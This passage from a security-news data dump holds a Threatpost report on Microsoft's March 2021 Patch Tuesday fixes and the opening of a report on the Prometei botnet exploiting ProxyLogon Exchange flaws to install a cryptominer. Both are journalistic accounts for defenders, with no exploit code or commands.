patched.\n\n\u201cAs we\u2019ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits,\u201d according to Satnam Narang, staff research engineer at Tenable. \u201cWe strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible.\u201d\n\n## **PoC Exploit Code Available For Windows Privilege Elevation Flaw**\n\nIn addition to the five actively exploited vulnerabilities, Microsoft issued a patch for a vulnerability in Win32K for which public PoC exploit code is also available. This flaw [ranks important in severity](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27077>), and exists in Windows Win32K ([CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>)). A local attacker can exploit the flaw to gain elevated privileges, according to Microsoft. While PoC exploit code is available for the flaw, the tech giant said it has not been exploited in the wild, and that exploitation is \u201cless likely.\u201d\n\n## **Other Microsoft Critical Flaws**\n\n** **Microsoft patched 14 critical vulnerabilities overall in this month\u2019s Patch Tuesday updates, including ([CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>)), which exists in Windows DNS server and can enable remote code execution. The flaw is one out of seven vulnerabilities in Windows DNS server; the other six are rated important severity. The critical-severity flaw can be exploited by an attacker with an existing foothold on the same network as the vulnerable device; the attack complexity for such an attack is \u201clow.\u201d\n\nA critical remote code-execution flaw also exists in Microsoft\u2019s Windows Hyper-V hardware virtualization product ([CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>)), which could allow an authenticated attacker to execute code on the underlying Hyper-V server.\n\n\u201cWhile listed as a CVSS of 9.9, the vulnerability is really only relevant to those using the Plan-9 file system,\u201d said Childs. \u201cMicrosoft does not list other Hyper-V clients as impacted by this bug, but if you are using Plan-9, definitely roll this patch out as soon as possible.\u201d\n\nAnother bug of note is a remote code-execution flaw existing on Microsoft\u2019s SharePoint Server ([CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>)). The flaw can be exploited by a remote attacker on the same network as the victim, and has a low attack complexity that makes exploitation more likely, according to Microsoft.\n\n\u201cFor an attack to succeed, the attacker must be able to create or modify sites with the SharePoint server,\u201d according to Childs. \u201cHowever, the default configuration of SharePoint allows authenticated users to create sites. When they do, the user will be the owner of this site and will have all the necessary permissions.\u201d\n\n## **Microsoft Exchange Updates: Patch Now**\n\nThe Microsoft Patch Tuesday updates come as businesses grapple with existing Microsoft Exchange zero-day vulnerabilities that were previously disclosed and continue to be used in active exploits. Overall, Microsoft had released out-of-band fixes for seven vulnerabilities \u2013 four of which were the actively-exploited flaws.\n\nOn Monday, the [European Banking Authority disclosed a cyberattack](<https://www.eba.europa.eu/cyber-attack-european-banking-authority-update-2>) that it said stemmed from an exploit of the Microsoft Exchange flaw. Beyond the European Banking Authority, one recent report said [that at least 30,000 organizations](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) across the U.S. have been hacked by attackers exploiting the vulnerability.\n\n\u201cIf you run Exchange on-premise, you need to follow the published guidance and apply the patches as soon as possible,\u201d said Childs. \u201cMicrosoft has even taken the extraordinary step of creating patches for out-of-support versions of Exchange. Ignore these updates at your own peril.\u201d\n\nAlso released on Tuesday were Adobe\u2019s security updates, [addressing a cache of critical flaws](<https://threatpost.com/adobe-critical-flaws-windows/164611/>), which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.\n\n**_Check out our free _****_[upcoming live webinar events](<https://threatpost.com/category/webinars/>)_****_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_** \n\u00b7 March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)) \n\u00b7 April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-09T22:12:56", "type": "threatpost", "title": "Microsoft Patch Tuesday Updates Fix 14 Critical Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27077"], "modified": "2021-03-09T22:12:56", "id": "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "href": "https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-23T17:33:27", "description": "A heretofore little-seen botnet dubbed Prometei is taking a page from advanced persistent threat (APT) cyberattackers: The malware is exploiting two of the Microsoft Exchange vulnerabilities collectively known as ProxyLogon, in order to drop a Monero cryptominer on its targets.\n\nIt\u2019s also highly complex and sophisticated, researchers noted. While cryptojacking is its current game, Cybereason researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from the Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\n\u201cIf they wish to, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\u201d Cybereason researcher Lior Rochberger noted in [an analysis](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) released Thursday. \u201c[And] since cryptomining can be resource-hogging, it can affect the performance and stability of critical servers and endpoints, ultimately affecting business continuity.\u201d\n\nThe report noted that Cybereason has recently seen wide swathes of Prometei attacks on a variety of industries, including construction, finance, insurance, manufacturing, retail, travel and utilities. Geographically speaking, it has been observed infecting networks in the U.S., U.K. and many other European countries, as well as countries in South America and East Asia. It was also observed that the threat actors appear to be explicitly avoiding infecting targets in former Soviet-bloc countries.\n\n\u201cThe victimology is quite random and opportunistic rather than highly targeted, which makes it even more dangerous and widespread,\u201d Rochberger said.\n\n## **Exploiting Microsoft Exchange Security Bugs**\n\n[ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) consists of four flaws that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), or as in this case, [cryptominers](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>).\n\nMicrosoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nWhen it comes to Prometei, researchers have observed attacks against companies in North America making use of the ProxyLogon bugs tracked as CVE-2021-27065 and CVE-2021-26858. Both are post-authentication arbitrary file-write vulnerabilities in Exchange; once authenticated with an Exchange server, attackers could write a file to any path on the server \u2013 thus achieving RCE.\n\nThe attackers use the vulnerabilities to install and execute the China Chopper web shell, according to Rochberger. They then use [China Chopper to launch a PowerShell](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>), which in turn downloads a payload from an attacker-controlled URL. That payload is then saved and executes, which ultimately starts the Prometei botnet execution.\n\n\u201cPrometei is a modular and multistage cryptocurrency botnet that was first discovered in July 2020 which has both Windows and Linux versions,\u201d explained Rochberger, who added that the botnet could extend back to 2016. \u201cThe latest versions of Prometei now provide the attackers with a sophisticated and stealthy backdoor that supports a wide range of tasks that make mining Monero coins the least of the victims\u2019 concerns.\u201d\n\n## **Prometei Under the Hood**\n\nThe first module of the botnet, zsvc.exe, copies itself into C:\\Windows with the name \u201csqhost.exe,\u201d and then creates a firewall rule that will allow sqhost.exe to create connections over HTTP, according to the research. It also sets a registry key for persistence, and creates several other registry keys for later command-and-control (C2) communications by additional modules.\n\n\u201cSqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands,\u201d according to the analysis. \u201cSqhost.exe is able to parse the prometei.cgi file from four different hardcoded C2 servers. The file contains the command to be executed on the machine. The commands can be used as standalone native OS commands\u2026or can be used to interact with the other modules of the malware.\u201d\n\nIt also controls the XMRig cryptominer that the malware installs on the machine, Cybereason noted. The commands on offer include the ability to execute a program or open a file; start or stop the mining process; download files; gather system information; check if a specific port is open; search for specific files or extensions; and update the malware \u2013 among other things.\n\n\u201cThe malware authors are able to add more modules and expand their capabilities eas